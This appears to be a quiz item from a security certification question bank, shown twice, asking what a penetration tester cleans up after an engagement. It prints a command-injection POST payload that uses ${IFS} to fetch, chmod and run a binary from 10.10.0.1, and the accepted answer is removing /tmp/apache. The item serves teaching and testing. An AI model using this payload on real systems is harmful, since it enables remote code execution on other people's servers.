A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} - c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?
A) grep -v apache ~/.bash_history ~/.bash_history
B) rm -rf /tmp/apache
C) chmod 600 /tmp/apache
D) taskkill /IM "apache" /F

Question

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} - c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?
A) grep -v apache ~/.bash_history > ~/.bash_history
B) rm -rf /tmp/apache
C) chmod 600 /tmp/apache
D) taskkill /IM "apache" /F

Quizplus · Accepted Answer

The exploit creates a file called apache in the /tmp directory and makes it executable. The penetration tester should remove this file after the engagement to prevent it from being used by other attackers.

A Penetration Tester Was Able to Gain Access to a System